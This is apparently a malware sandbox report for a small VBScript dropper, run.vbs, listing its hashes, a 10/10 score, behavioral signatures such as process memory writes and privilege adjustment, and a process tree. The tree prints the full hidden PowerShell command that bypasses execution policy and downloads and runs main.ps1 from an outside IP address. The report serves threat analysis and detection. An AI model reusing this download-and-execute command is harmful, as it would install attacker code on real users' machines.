Analysis
  max time kernel: 122s
  max time network: 125s
  platform: windows7_x64
  resource: win7-20231020-en
  resource tags: arch:x64, arch:x86, image:win7-20231020-en, locale:en-us, os:windows7-x64, system
  submitted: 06/11/2023, 06:49
Static task: static1
Behavioral task: behavioral1
  Sample: run.vbs
  Resource: win7-20231020-en
  5 signatures, 150 seconds
Behavioral task: behavioral2
  Sample: run.vbs
  Resource: win10v2004-20231023-en
  6 signatures, 150 seconds
General
  Target: run.vbs
  Size: 269B
  MD5: 3dba029327dfd9f7166738e4d851cb8a
  SHA1: 14c8f1078e934ae31a41eac643e9a1cca2ecf0c6
  SHA256: 666131bf5ae20a64b55a835006afae921f20fc23923aeaf0d918ebb4718f8e4e
  SHA512: 39585229250c8d48093fa78f5779d785efbaf41ac5829070f9316f2b95368b940f25d04f0c2a2aa4dac36c71172a9f426ed9dea01a8c7d7bbd01a7b16b943787
  Score: 10/10
Malware Config
  Extracted
  Language: ps1
  Deobfuscated
  URLs (ps1.dropper): http://138.68.134.18/main.ps1
Signatures
  Blocklisted process makes network request (1 IoC)
    flow  pid  Process
    2     632  powershell.exe
  Enumerates physical storage devices (1 TTP)
    Attempts to interact with connected storage/optical drive(s).
  Suspicious behavior: EnumeratesProcesses (1 IoC)
    pid  Process
    632  powershell.exe
  Suspicious use of AdjustPrivilegeToken (1 IoC)
    description              pid  Process
    Token: SeDebugPrivilege  632  powershell.exe
  Suspicious use of WriteProcessMemory (3 IoCs)
    description                       pid   Process      procid_target
    PID 2080 wrote to memory of 632   2080  WScript.exe  28
    PID 2080 wrote to memory of 632   2080  WScript.exe  28
    PID 2080 wrote to memory of 632   2080  WScript.exe  28
Processes
  C:\Windows\System32\WScript.exe (PID 2080)
    Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\run.vbs"
    - Suspicious use of WriteProcessMemory
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 632, child of 2080)
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://138.68.134.18/main.ps1')"
      - Blocklisted process makes network request
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken